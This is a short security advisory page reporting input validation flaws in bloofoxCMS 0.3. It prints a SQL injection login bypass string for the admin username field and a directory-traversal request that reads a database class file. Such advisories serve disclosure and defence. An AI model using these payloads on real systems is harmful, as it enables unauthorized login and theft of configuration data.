Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

bloofoxCMS Multiple Input Validation Vulnerabilities

An exploit is not required. Example authentication credentials sufficient to bypass controls were provided:

Username: admin' or 1=1 /*
Password: something

An example for the directory-traversal vulnerability was provided:

GET: http://www.example.com/bloofoxCMS_0.3/file.php?file=../../system/class_mysql.php







 

Privacy Statement
Copyright 2009, SecurityFocus